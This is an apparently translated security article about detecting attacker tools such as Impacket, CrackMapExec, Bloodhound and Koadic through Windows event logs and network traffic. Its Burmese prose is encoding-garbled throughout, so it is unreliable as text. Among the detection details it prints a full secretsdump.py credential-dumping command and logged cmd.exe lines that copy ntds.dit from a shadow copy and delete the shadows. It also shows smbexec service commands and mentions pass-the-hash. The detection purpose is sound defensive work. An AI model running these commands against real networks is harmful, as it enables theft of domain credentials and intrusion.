áá±á¬áºááá¯ááááºááá¹áááœáẠááá¯ááºááá¯ááºááŸá¯á¡áá±á¡ááœááºááẠááŸá
áºá
ááºááá¯ážáá¬áá±áááº- á¥ááá¬
á€áááááá¬áá»á¬ážááᯠáááŠážááá¯ážáá±á¬ááºááŒááºážá¡ááœáẠá¡áá¯á¶ážááá»áá±á¬áºáááºáž á¡ááŒá±áá¶á¡áá±á¬ááºá¡áŠá¡ááœááºáž ááá¯ááºááá¯ááºááŸá¯ááᯠááœá¶á·ááŒáá¯ážááá¯ážáááºá
á±áááºá¡ááœáẠáááááŒá¯ááá·áºáááºá ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááºáááºážáá»ááºááᯠááá¯ážáá±á¬ááºáááºáá±á¬ááºááŒá®ážáá±á¬áẠááá¯ááºááá¯ááºááŸá¯á á¡ááá·áºá¡áá»áá¯ážáá»áá¯ážááœáẠáááºážááá¯á·ááᯠá¡áá¯á¶ážááŒá¯ááŒáááºá á€áááºážá¡á¬ážááŒáá·áºá áááºážááẠááŸá¬ááœá±áááºáááºáá²ááŒá®áž áááºážááá¬á¡áá°á¡áá®ááŒáá·áºáᬠáááŒá¬ááááŒá
áºáááºá
áá»áœááºá¯ááºááá¯á· áá¯ááºáá±á¬ááºááẠááá¯á¡ááºáááº-
- Hacking Tools áá»á¬áž áááºááá¯á·á¡áá¯ááºáá¯ááºáááºááᯠáá¬ážáááºáá«á. ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááºááá·áºáááºážááá¬áá»á¬ážááᯠá¡áá¯á¶ážáá»ááẠááá¯á¡ááºáááºááᯠááŸá¬ááœá±áá«á
- ááá¯ááºááá¯ááºááŸá¯áá áºáá¯ááááá¡ááá·áºááœáẠááááºážá¡áá»ááºá¡áááºáá¯á¶ááŒá¯á¶áá±ážáááááá¬áá»á¬ážá áááœá±á·ááá¯ááºáá±á¬á¡áá¬ááᯠááŸá¬ááœá±áá«á. ááá¯ááºááá¯ááºáá°ááẠá¡ááœááºážááá¯ááºážááá¯ááºááá¯ááºáá°ááŒá áºáá±á¬ááŒá±á¬áá·áº ááá¯á·ááá¯áẠááá¯ááºááá¯ááºáá°ááẠááááºáááááá²á·áá±á¬ á¡ááŒá±áá¶á¡áá±á¬ááºá¡á¡á¯á¶á¡ááœááºážááŸá á¡áá±á«ááºáá áºáá¯ááᯠá¡áá¯á¶ážáá»áá±áá±á¬ááŒá±á¬áá·áº áá±á¬ááºááŸááºážááŒááºážá¡ááá·áºááᯠáá»á±á¬áºááœá¬ážááá¯ááºáááºá áá°á áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážá ááœááºážáááºáá áºáá¯áá¯á¶ážááᯠááŒááºáááºáá°áá±á¬ááºááẠááŒá áºáá¬ááá¯ááºáá±á¬ááŒá±á¬áá·áº áá±á¬ááºááẠááŸá¯ááºááŸá¬ážááŸá¯áá»á¬ážááᯠáá±á¬áºáá¯ááºááá¯á ááẠááŒá áºáá¬áááºá
- áá»á°ážáá»á±á¬áºáááºáá±á¬ááºááŸá¯ááŸá¬ááœá±áá±ážáááááá¬áá»á¬ážá០ááŸá¬ážááœááºážáá±á¬á¡ááŒá¯ááá±á¬áá»á¬ážááᯠáááºááŸá¬ážáá«á. áá±á¬ááºááŸááºážááŸá¯áá áºáá¯áááºážááá¯á¡ááŒá±áá¶á á¡áá»áá¯á·áá±á¬áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠááœá±á·ááŸááá«á áááŒá¬áá á¡ááŸá¬ážá¡ááœááºážáá»á¬ážááŒá áºááá¯ááºáááºááᯠááá±á·ááá·áºáá«á á¡áá»á¬ážá¡á¬ážááŒáá·áº á¡ááŒá±áá¶á¡áá±á¬ááºá¡á¡á¯á¶ááœáẠááááºážá¡áá»ááºá¡áááºáá»á¬ážáááŸáááẠááááá áºáá»ááºááœááºááá¬ážáááºáááºážáááºážáá»á¬ážááŸáá·áº ááœá²ááŒá¬ážááááá±á¬ áá¯á¶áá±á¬ááºáá±á¬áááºážáááºážáá»á¬ážá áœá¬ááŸááááºá
áá®áááááá¬ááœá±á ááá¯ááºááá¯ááºáá°ááœá±ááᯠáá¬áá±ážááá²á áááºážááẠImpacket ááŒá áºáá«áá ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááºáááºážáá»ááºááᯠáá»áá¯ážáá»ááºááŒá®ážáá±á¬áẠááá¯ááºááá¯ááºááŸá¯á á¡ááá·áºá¡áá»áá¯ážáá»áá¯ážááœáẠá¡áá¯á¶ážááŒá¯ááá¯ááºááá·áº ááŒá®ážáá¬ážáá±á¬ áá±á¬áºáá»á°ážá á¬ááŒáá·áºááá¯ááºááᯠáááŸááááºááŒá áºáááºá áááááá¬áá»á¬ážá áœá¬ááẠImpacket module áá»á¬ážááᯠá¡ááœááºážááá¯ááºážá á¡áá¯á¶ážááŒá¯ááẠ- á¥ááá¬á Metasploitá áááºážááœáẠá¡áá±ážááááºážá¡áááá·áºáá±ážáá¯ááºáá±á¬ááºááŸá¯á¡ááœáẠdcomexec ááŸáá·áº wmiexec á Impacket ááŸááá·áºááœááºážáá¬ážáá±á¬ memory ááŸá¡áá±á¬áá·áºáá»á¬ážááá°áááºá¡ááœáẠsecretsdump ááŸááááºá ááááºá¡áá±ááŒáá·áºá ááá¯ááá¯á·áá±á¬ á á¬ááŒáá·áºááá¯ááºá áá¯ááºáá±á¬ááºáá»ááºááᯠááŸááºáááºáá±á¬ áá±á¬ááºááŸááºážááŒááºážá០áááºážáááºáá¬ááŸá¯ááᯠááááŸáááá¯ááºáááºááŒá áºáááºá
áááºáá®ážáá°áá»á¬ážááẠCrackMapExec (ááá¯á·ááá¯áẠááá¯ážááá¯áž CME) á¡ááŒá±á¬ááºáž âPowed by Impacketâ áá±ážáá²á·áááºááŸá¬ ááá¯ááºááá¯ááºááŸá¯ááá¯ááºáá«á ááá¯á·á¡ááŒááºá CME ááœáẠáá°ááŒáá¯ááºáá»á¬ážáá±á¬ á¡ááŒá±á¡áá±áá»á¬ážá¡ááœáẠá¡áááºááá·áºááŒá¯áá¯ááºááá¯ááºáá±á¬ áá¯ááºáá±á¬ááºááá¯ááºá áœááºáž ááŸááááº- á áá¬ážááŸááºáá»á¬áž ááá¯á·ááá¯áẠáááºážááá¯á·á hash áá»á¬ážááᯠááá°áááºá¡ááœáẠMimikatzá á¡áá±ážááááºážá áá áºááŒáá·áº ááœááºáá»ááºááŸá¯á¡ááœáẠMeterpreter ááá¯á·ááá¯áẠEmpire á¡á±ážáá»áá·áºááᯠá¡áá±á¬ááºá¡áááºáá±á¬áºááŒááºážááŸáá·áº áááºá¹áá±á¬áá±á«áºááœáẠBloodhound ááá¯á·ááŒá áºáááºá
áá»áœááºá¯ááºááá¯á·ááœá±ážáá»ááºáá²á·áá±á¬ áááááááááá¬ááŸá¬ Koadic ááŒá áºáááºá áááŒá¬áá±ážáá®á áááºážááᯠ25 áá¯ááŸá Ạááá¯ááºáá¶ááᬠáááºáá¬ááœááºáááá·áº DEFCON 2017 ááœáẠáááºááŒáá²á·ááŒá®áž á á¶ááá¯ááºáá±á¬ áá»ááºážáááºááŸá¯ááŒáá·áº ááœá²ááŒá¬ážáá¬ážáááº- áááºážááẠHTTPá Java Script ááŸáá·áº Microsoft Visual Basic Script (VBS) ááŸáááá·áº á¡áá¯ááºáá¯ááºáá«áááºá á€áá»ááºážáááºáááºážááᯠliving off land áá¯áá±á«áºáááº- tool ááẠWindows ááœááºáááºáá±á¬ááºáá¬ážáá±á¬ ááŸá®ááá¯ááŸá¯áá»á¬ážááŸáá·áº á á¬ááŒáá·áºááá¯ááºáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áááºá áááºáá®ážáá°áá»á¬ážááẠáááºážááᯠCOM Command & Control ááá¯á·ááá¯áẠC3 áá¯áá±á«áºáááºá
IMPACKET
Impacket á áá¯ááºáá±á¬ááºááá¯ááºá áœááºážááẠAD á¡ááœááºáž áááºážáá±á¬ááºááŒááºážááŸáá·áº á¡ááœááºážááá¯ááºáž MS SQL áá¬áá¬áá»á¬ážá០áá±áá¬áá»á¬áž á á¯áá±á¬ááºážááŒááºážá á¡áá±á¬ááºá¡áá¬ážáá»á¬áž ááá°ááŒááºážááá¯ááºáᬠáááºážááá¬áá»á¬ážá¡áá áá»ááºááŒáá·áºáááº- á€áááºááŸá¬ SMB áááºááá·áºááá¯ááºááá¯ááºááŸá¯ááŸáá·áº domain controller á០áá¯á¶ážá áœá²áá° á áá¬ážááŸááºáá»á¬áž áááºááŸáºáá»á¬ážáá«ááŸááá±á¬ ntds.dit ááá¯ááºááᯠááá°ááŒááºáž ááŒá áºáááºá Impacket ááẠááá°áá®áá±á¬áááºážáááºážáá±ážáá»áá¯ážááŒáá·áº WMIá Windows Scheduler Management Serviceá DCOM ááŸáá·áº SMB ááá¯á·ááᯠá¡áá¯á¶ážááŒá¯ááŒá®áž á¡áá±ážá០ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááŒá®áž á¡áá±á¬ááºá¡áá¬ážáá»á¬áž ááá¯á¡ááºáá«áááºá
áá»áŸáá¯á·ááŸááºáá»ááºáá»á¬áž
áá»áŸáá¯á·ááŸááºáá»ááºááœá±ááᯠáá±á·áá¬ááŒáá·áºáá¡á±á¬ááºá áááºážááẠá¡áá¯á¶ážááŒá¯áá°á ááºáá»á¬ážááŸáá·áº ááá¯ááááºážááááºážáá»á¯ááºáá°áá»á¬áž ááŸá áºáá»áá¯ážáá¯á¶ážááᯠáá áºááŸááºáá¬ážááá¯ááºááá·áº áá±á¬áºáá»á°ážáá áºáá¯ááŒá áºáááºá áááºááá¯áá®á§áááᬠLSAá SAMá SECURITYá NTDS.dit áááá¹áá°áá»á¬ážááᯠááá°ááẠá¡áá¯á¶ážááŒá¯ááá¯ááºááŒá®ážá ááá¯á·ááŒá±á¬áá·áº ááá¯ááºááá¯ááºááŸá¯á á¡ááá·áºá¡áá»áá¯ážáá»áá¯ážááœáẠááŒááºááœá±á·ááá¯ááºáááºá Module ááá¯ááºáá±á¬ááºááŸá¯ááœáẠáááá¡ááá·áºááŸá¬ Pass the Hash ááá¯ááºááá¯ááºááŸá¯ááᯠá¡ááá¯á¡áá»á±á¬ááºáá¯ááºáá±á¬ááºááẠá¡áá¯á¶ážááŒá¯áá°áá áá¬ážááŸáẠááá¯á·ááá¯áẠáááºážá hash áá áºáá¯áá¯ááá¯á¡ááºáá±á¬ SMB ááŸáá áºááá·áº á á áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážááŒááŒááºážááŒá áºáááºá áááºáá±á¬ááºááŸá¯ááááºážáá»á¯ááºááŸá¯áááºáá±áá»á¬ (SCM) ááá¯á·áááºáá±á¬ááºááœáá·áºááá¯ááœáá·áºááẠáá±á¬ááºážááá¯áá»ááºáá áºáá¯ááœááºáá±á«áºáá¬ááŒá®áž ááá¯ááºááá¯ááºáá°ááẠá áááºáá«áááºá á¬ážáá±á¬á¡ááá¯ááºážá¡áááºáá»á¬ážááá±áá¬ááá¯ááŸá¬ááœá±ááá¯ááºááŒá®áž SMB ááŸáá áºááá·áºááááºáá»á¬ážááá¯ááá°á¡áá¯á¶ážááŒá¯áᬠwinreg áááá¯ááá¯áá±á¬ááŸáá áºááá·áº ááŸááºáá¯á¶áááºááŒááºážááá¯á·áááºáá±á¬ááºááœáá·áºáááŸáááẠáá±á¬ááºážááá¯áá»ááºáá áºáá¯ááœááºáá±á«áºáá¬áááºá
áá¯á¶ááœááºá 1 winreg áááá¯ááá¯áá±á¬ááᯠá¡áá¯á¶ážááŒá¯áá±á¬á¡áá«á LSA ááŒáá·áº registry key ááá¯á¡áá¯á¶ážááŒá¯á áááºáá±á¬ááºááœáá·áºááᯠáááºááá¯á·áááºáá¯á¶áááŸááááºááᯠáá»áœááºá¯ááºááá¯á· ááŒááºááœá±á·ááááºá áá«ááá¯áá¯ááºááá¯á·á opcode 15 - OpenKey áá²á· DCERPC á¡áááá·áºááᯠáá¯á¶ážáá«á
ááááºážá 1. winreg protocol ááᯠá¡áá¯á¶ážááŒá¯á registry key ááá¯ááœáá·áºáá«á
ááá¯á·áá±á¬ááºá áá±á¬á·ááá¯áááºáá±á¬ááºááœáá·áºááá±á¬á¡áá«á áááºááá¯ážáá»á¬ážááᯠopcode 20 ááŒáá·áº SaveKey á¡áááá·áºááŒáá·áº ááááºážáááºážáááºá Impacket ááẠáááºážááᯠá¡ááœááºáááá»áá±á¬áááºážáááºážááŒáá·áº áá¯ááºáá±á¬ááºáááºá áááºážááẠ.tmp ááŒáá·áº ááá·áºáá¬ážáá±á¬ áá»áááºážá á¬áá¯á¶áž 8 áá¯á¶ážáá«áá±á¬ ááá¯ááºáá áºáá¯ááœáẠáááºááá¯ážáá»á¬ážááᯠááááºážáááºážáááºá ááá¯á·á¡ááŒááºá á€ááá¯ááºá áá±á¬ááºáááºá¡ááºáá¯ááºááẠSystem32 áááºážááœáŸááºá០SMB ááŸáá áºááá·áº ááŒá áºáá±á«áºáá«áááºá
ááááºážá 2. á¡áá±ážááááºážá
ááºá០registry áá±á¬á·ááᯠááá°ááẠá¡á
á®á¡á
ááº
winreg áááá¯ááá¯áá±á¬á áá®ážááŒá¬ážá¡áááºáá»á¬ážá ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááŸáá·áº áááºážááá¯á·áá¡ááŸá¬á á¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯á á¡áá»áá¯á·áá±á¬ registry áá¬áááœá²áá»á¬ážááá¯á· á á¯á¶á ááºážáá±ážááŒááºážááŒááºážááŒáá·áº ááœááºáááºáá±á«áºááŸá ááá¯áá²á·ááá¯á·áá±á¬áá¯ááºáá±á¬ááºáá»ááºááᯠááŸá¬ááœá±ááœá±á·ááŸáááá¯ááºáá«áááºá
ဠmodule ááẠWindows event log ááœáẠááŒá±áá¬áá¶áá»á¬ážááᯠáá¬ážáá²á·á ááŸá¬ááœá±áááœááºáá°á á±áááºá á¥ááá¬á¡á¬ážááŒáá·áºá command ááá¯áá¯ááºáá±á¬ááºááŒááºážáááááºá¡ááŒá áº
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 ááŸááºáááºážááœáẠá¡á±á¬ááºáá«ááŒá áºáááºáá»á¬ážá áá±á¬á·ááœá²ááᯠáá»áœááºá¯ááºááá¯á·ááŒááºááá«áááº-
1. 4624 - á¡áá±ážá០Logon á
2. 5145 - winreg á¡áá±ážááááºážáááºáá±á¬ááºááŸá¯ááá¯á· áááºáá±á¬ááºááœáá·áºááᯠá
á
áºáá±ážááŒááºážá
3. 5145 - System32 áááºážááœáŸááºááœáẠááá¯ááºáááºáá±á¬ááºááœáá·áºá¡ááœáá·áºá¡áá±ážáá»á¬ážááᯠá
á
áºáá±ážááŒááºážá ááá¯ááºááœáẠá¡áááºáá±á¬áºááŒáá« áá»áááºážá¡áááºáá«ááŸááááºá
4. 4688 - vssadmin ááá¯ááœáá·áºááá·áº cmd.exe áá¯ááºáááºážá
ááºááᯠáááºáá®ážááŒááºáž-
âC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - command ááŒáá·áº áá¯ááºáááºážá ááºáá áºáᯠáááºáá®ážááŒááºáž-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - command ááŒáá·áº áá¯ááºáááºážá ááºáá áºáᯠáááºáá®ážááŒááºáž-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - command ááŒáá·áº áá¯ááºáááºážá ááºáá áºáᯠáááºáá®ážááŒááºáž-
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
Post-exploitation tools áá»á¬ážáá²á·ááá¯á·áááºá Impacket ááœáẠá¡áá±ážá០command áá»á¬ážááᯠáá¯ááºáá±á¬ááºáááºá¡ááœáẠmodule áá»á¬ážááŸááááºá áá»áœááºá¯ááºááá¯á·ááẠá¡áá±ážááááºážá ááºááœáẠá¡ááŒááºá¡ááŸááºá¡áá»áá¯ážááŒá¯ááá·áº command shell ááá¯áá±ážáá±á¬ááºááá·áº smbexec ááá¯á¡á¬áá¯á¶á áá¯ááºáá«áááºá ဠmodule ááẠá áá¬ážááŸáẠááá¯á·ááá¯áẠá áá¬ážááŸáẠhash ááŒáá·áºááŒá áºá á± SMB ááŸáá áºááá·áº á á áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážááŒáááºáááºáž ááá¯á¡ááºáá«áááºá áá¯á¶ááœááºá áá¯á¶ 3 ááœááºááá¯áá²á·ááá¯á·áá±á¬áááááá¬á¡áá¯ááºáá¯ááºáá¯á¶á¥ááá¬áá áºáá¯ááá¯áá»áœááºá¯ááºááá¯á·ááœá±á·ááŒááºááááºá á€á¡ááŒá±á¡áá±ááœááºáááºážáááºáá±ááá¶á á®áá¶ááá·áºááœá²áá°ááœááºááá¯ážááºááŒá áºáááºá
ááááºážá 3. á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážááŒá¯áá±á¬ smbexec ááœááºááá¯ážááº
á á áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážááŒááŒá®ážáá±á¬áẠsmbexec ááááá¡ááá·áºááŸá¬ OpenSCManagerW command (15) ááŒáá·áº SCM ááá¯ááœáá·áºáááºááŒá áºáááºá áá±ážááœááºážááẠááŸááºáá¬ážááœááºááŒá áºáááº- á ááºá¡áááºá¡ááœááºááẠDUMMY ááŒá áºáááºá
ááááºážá 4. Service Control Manager ááá¯ááœáá·áºááẠáá±á¬ááºážááá¯áá«á
ááá¯á·áá±á¬áẠáááºáá±á¬ááºááŸá¯ááᯠCreateServiceW command (12) ááᯠá¡áá¯á¶ážááŒá¯á áááºáá®ážáááºá smbexec ááá á¹á ááœááºá á¡áá»áááºááá¯ááºážááœáẠáá°áá®áá±á¬ command áááºáá±á¬ááºááŸá¯ logic ááᯠááœá±á·ááá¯ááºáá«áááºá áá¯á¶ááœááºá 5 á¡á áááºážáá±á¬ááºááẠáááŒá±á¬ááºážáá²ááá¯ááºáá±á¬ á¡áááá·áºáá±ážáááºááŸááºáá»ááºáá»á¬ážááᯠááœáŸááºááŒáááºá á¡áá«áá±á¬ááºááẠááá¯ááºááá¯ááºáá°á¡á¬áž ááŒá±á¬ááºážáá²ááá¯ááºááá·áºá¡áá¬ááᯠááœáŸááºááŒáááºá executable file áá¡áááºá áááºážá directory ááŸáá·áº output ááá¯ááºááᯠááŒá±á¬ááºážáá²ááá¯ááºáááºááᯠááááŒááºáááºááŸá¬ ááœááºáá°áá±á¬áºáááºáž áá»ááºááẠImpacket module á áá¯áá¹ááááᯠáááááá¯ááºá á±áá² ááŒá±á¬ááºážáá²ááẠááá¯ááá¯áááºáá²áá«áááºá
ááááºážá 5. Service Control Manager ááá¯á¡áá¯á¶ážááŒá¯á áááºáá±á¬ááºááŸá¯áá
áºáá¯áááºáá®ážááẠáá±á¬ááºážááá¯ááŒááºážá
Smbexec ááẠWindows event log ááœáẠáááá¬áááºááŸá¬ážáá±á¬ ááŒá±áá¬áá»á¬ážááᯠáá»ááºáá¬ážáá²á·ááẠá ipconfig command ááŒáá·áº á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážáááºáá±á¬ááºáá±á¬ command shell á¡ááœáẠWindows Server 2016 ááŸááºáááºážááœááºá á¡á±á¬ááºáá« ááŒá áºáááºáá»á¬ážá á¡ááá á¡á á®á¡á á¥áºááᯠáá»áœááºá¯ááºááá¯á· ááŒááºááá«áááºá
1. 4697 â áá¬ážáá±á¬ááºáá ááºááœáẠáááºáá±á¬ááºááŸá¯áááºáááºááŒááºáž-
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - á¡ááŸáẠ1 á០á¡ááŒá±á¬ááºážááŒáá»ááºáá»á¬ážááŒáá·áº cmd.exe áá¯ááºáááºážá
ááºááᯠáááºáá®ážááŒááºážá
3. 5145 - C$ directory ááŸá __output ááá¯ááºááá¯á· áááºáá±á¬ááºááœáá·áºááᯠá
á
áºáá±ážááŒááºážá
4. 4697 â áá¬ážáá±á¬ááºáá
ááºááœáẠáááºáá±á¬ááºááŸá¯áááºáááºááŒááºážá
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - á¡ááŸáẠ4 á០á¡ááŒá±á¬ááºážááŒáá»ááºáá»á¬ážááŒáá·áº cmd.exe áá¯ááºáááºážá
ááºááᯠáááºáá®ážááŒááºážá
6. 5145 - C$ directory ááŸá __output ááá¯ááºááá¯á· áááºáá±á¬ááºááœáá·áºááᯠá
á
áºáá±ážááŒááºážá
Impacket ááẠááá¯ááºááá¯ááºáá±ážáááááá¬áá»á¬áž ááœá¶á·ááŒáá¯ážááá¯ážáááºááŸá¯á¡ááœáẠá¡ááŒá±áá¶ááŒá áºáááºá áááºážááẠWindows á¡ááŒá±áá¶á¡áá±á¬ááºá¡á¡á¯á¶ááŸá áááá¯ááá¯áá±á¬á¡á¬ážáá¯á¶ážáá®ážáá«ážááᯠáá¶á·ááá¯ážáá±ážááŒá®áž áá áºáá»áááºáááºážááœáẠáááºážáááá¯ááºááá¯ááºááá¹ááá¬á¡ááºá¹áá«áááºáá»á¬ážááŸááááºá á€ááœáẠáááá»áá±á¬ winreg áá±á¬ááºážááá¯ááŸá¯áá»á¬ážá ááŸáá·áº SCM API ááᯠá¡ááºá¹áá«ááẠááœááºáá²ááŸá¯ááœá²á·á ááºážááŒááºážá ááá¯ááºá¡áááºáá±á¬áºááẠááŸáá·áº SMB áá»áŸáá±ááŒááºáž SYSTEM32 ááá¯á·áá«ááŸááááºá
CRACKMAPEXEC
CME áááááá¬ááẠááœááºáááºá¡ááœááºáž ááá¯ážáááºá á±ááẠááá¯ááºááá¯ááºáá°áá¯ááºáá±á¬ááºáááá·áº áá¯á¶ááŸááºáá¯ááºáá±á¬ááºááŸá¯áá»á¬ážááᯠá¡ááá¯á¡áá»á±á¬ááºáá¯ááºáá±á¬ááºááẠá¡áááá¡á¬ážááŒáá·áº áá®ááá¯ááºážáá¯ááºáá¬ážáááºá áááºážááẠááá·áºá¡á¬áž áá¬áááºááŒá®áž á¡ááºáá«áá¬á¡á±ážáá»áá·áºááŸáá·áº Meterpreter ááá¯á·ááŸáá·áº ááœá²áááºáá¯ááºáá±á¬ááºááá¯ááºá á±áá«áááºá á¡áááá·áºáá»á¬ážááᯠáá»áŸáá¯á·ááŸááºáá¯ááºáá±á¬ááºáááºá¡ááœáẠCME ááẠáááºážááá¯á·ááᯠááŸá¯ááºááœá±ážá á±ááá¯ááºáááºá Bloodhound (áá®ážááŒá¬áž áá±á¬ááºááŸááºážáá±áž áááááá¬) ááᯠá¡áá¯á¶ážááŒá¯á ááá¯ááºááá¯ááºáá°ááẠáááºááŒáœáá±á¬ ááá¯ááááºáž á á®áá¶ááá·áºááœá²áá° á¡ááá¯ááºážá¡ááœáẠááŸá¬ááœá±ááŸá¯ááᯠá¡ááá¯á¡áá»á±á¬áẠáá¯ááºáá±á¬ááºááá¯ááºáááºá
ááœá±ážááœááºáá¶ááá¯
Bloodhound ááẠáá®ážááŒá¬ážáááááá¬áá áºáá¯á¡áá±ááŒáá·áº ááœááºáááºá¡ááœááºáž á¡ááá·áºááŒáá·áºáá±á¬ááºááŸááºážááŸá¯ááᯠááœáá·áºááŒá¯áááºá áááºážááẠá¡áá¯á¶ážááŒá¯áá°áá»á¬ážá á ááºáá»á¬ážá á¡á¯ááºá á¯áá»á¬ážá á ááºááŸááºáá»á¬ážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºáá»á¬ážááᯠá á¯áá±á¬ááºážááŒá®áž PowerShell script ááá¯á·ááá¯áẠbinary ááá¯ááºá¡ááŒá Ạáá¶á·ááá¯ážáá±ážáá«áááºá á¡áá»ááºá¡áááºá á¯áá±á¬ááºážááẠLDAP ááá¯á·ááá¯áẠSMB á¡ááŒá±áᶠáááá¯ááá¯áá±á¬áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áááºá CME áá±á«ááºážá ááºážááŸá¯ module ááẠBloodhound ááᯠáá¬ážáá±á¬ááºáá ááºááá¯á· áá±á«ááºážáá¯ááºáá¯ááºáááºá ááœááºáá»ááºááŒá®ážáá±á¬áẠá á¯áá±á¬ááºážáá¬ážáá±á¬áá±áá¬ááᯠáááºáááºáááºááŸáá·áº áááºáá¶áááºá á áá áºá¡ááœááºážááŸá áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠá¡ááá¯á¡áá»á±á¬ááºáá¯ááºáá±á¬ááºá á±ááŒá®áž áááºážááá¯á·ááᯠáááá¬áááºááŸá¬ážá á±áááºá Bloodhound graphical shell ááẠá á¯áá±á¬ááºážáá¬ážáá±á¬áá±áá¬áá»á¬ážááᯠááááºáá¯á¶á á¶ááŒáá·áºáááºááŒáááºá áááºážááẠááá¯ááºááá¯ááºáá°áá ááºá០ááá¯ááááºážá á®áá¶ááá·áºááœá²áá°áá¶ááá¯á· á¡ááá¯áá¯á¶ážáááºážááŒá±á¬ááºážááá¯ááŸá¬ááœá±ááá¯ááºá á±áá«áááºá
ááááºážá 6. Bloodhound Interface
áá¬ážáá±á¬ááºáá ááºááœááºáááºáááºáááºá áá±á¬áºáá»á°ážááẠATSVC ááŸáá·áº SMB ááᯠá¡áá¯á¶ážááŒá¯á áá¯ááºáá±á¬ááºá áá¬áá áºáá¯ááᯠáááºáá®ážáááºá ATSVC ááẠWindows Task Scheduler ááŸáá·áº áá¯ááºáá±á¬ááºáááºá¡ááœáẠá¡ááºáá¬áá±á·á áºáá áºáá¯ááŒá áºáááºá CME ááẠááœááºáááºáá±á«áºááœáẠáá¯ááºáá±á¬ááºá áá¬áá»á¬ážááᯠáááºáá®ážááẠáááºážá NetrJobAdd(1) áá¯ááºáá±á¬ááºáá»ááºááᯠá¡áá¯á¶ážááŒá¯áááºá CME module á០áá±ážááá¯á·ááá·áº á¥ááá¬ááᯠáá¯á¶ááœáẠááŒáá¬ážáááºá 7- áááºážááẠXML áá±á¬áºáááºááŸá á¡ááŒá±á¬ááºážááŒáá»ááºáá»á¬ážá áá¯á¶á á¶ááŒáá·áº cmd.exe áá±á«áºááá¯ááŸá¯ááŸáá·áº ááŸá¯ááºááœá±ážáá±á¬áá¯ááºáá áºáá¯ááŒá áºáááºá
áá¯á¶.áá CME ááŸáá
áºááá·áº áá¯ááºáá±á¬ááºá
áá¬áá
áºáá¯ááᯠáááºáá®ážááŒááºážá
áá¬áááºááᯠááœááºáá»ááºáááºá¡ááœáẠáááºááœááºážááŒá®ážáá±á¬ááºá áá¬ážáá±á¬ááºá á ááºááẠBloodhound ááá¯ááºááá¯áẠá áááºááŒá®áž áááºážááᯠá¡ááœá¬ážá¡áá¬ááœáẠááœá±á·ááŒááºááá¯ááºáááºá á á¶ááŒá¡á¯ááºá á¯áá»á¬ážá ááá¯ááááºážá¡ááœááºážááŸá á ááºáá»á¬ážááŸáá·áº á¡áá¯á¶ážááŒá¯áá°áá»á¬ážá á¬áááºážááᯠááá°ááẠLDAP á á¯á¶á ááºážáá±ážááŒááºážááŸá¯áá»á¬ážááŒáá·áº ááœá²ááŒá¬ážáááºááŸááºáá¬ážááŒá®áž SRVSVC NetSessEnum áá±á¬ááºážááá¯ááŸá¯ááŸáá áºááá·áº á¡áááºáááºáá±á¬á¡áá¯á¶ážááŒá¯áá°á¡á ááºážá¡áá±ážáá»á¬ážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºáá»á¬ážááá°áá«á
ááááºážá 8. SMB ááŸáá
áºááá·áº áááºááŒáœáá±á¬á¡á
ááºážá¡áá±ážáá»á¬ážá
á¬áááºážááᯠááá°ááŒááºážá
ááá¯á·á¡ááŒááºá á
á¬áááºážá
á
áºááœáá·áºáá¬ážááŒááºážááŒáá·áº áá¬ážáá±á¬ááºáá
ááºááœáẠBloodhound ááᯠá
áááºááŒááºážááẠID 4688 (áá¯ááºáááºážá
ááºáááºáá®ážááŸá¯) ááŸáá·áº áá¯ááºáááºážá
ááºá¡áááºáá«ááá·áº ááŒá
áºáááºáá
áºáá¯ááŒáá·áº ááá¯ááºáá«ááœá¬ážáá«áááºá «C:WindowsSystem32cmd.exe»
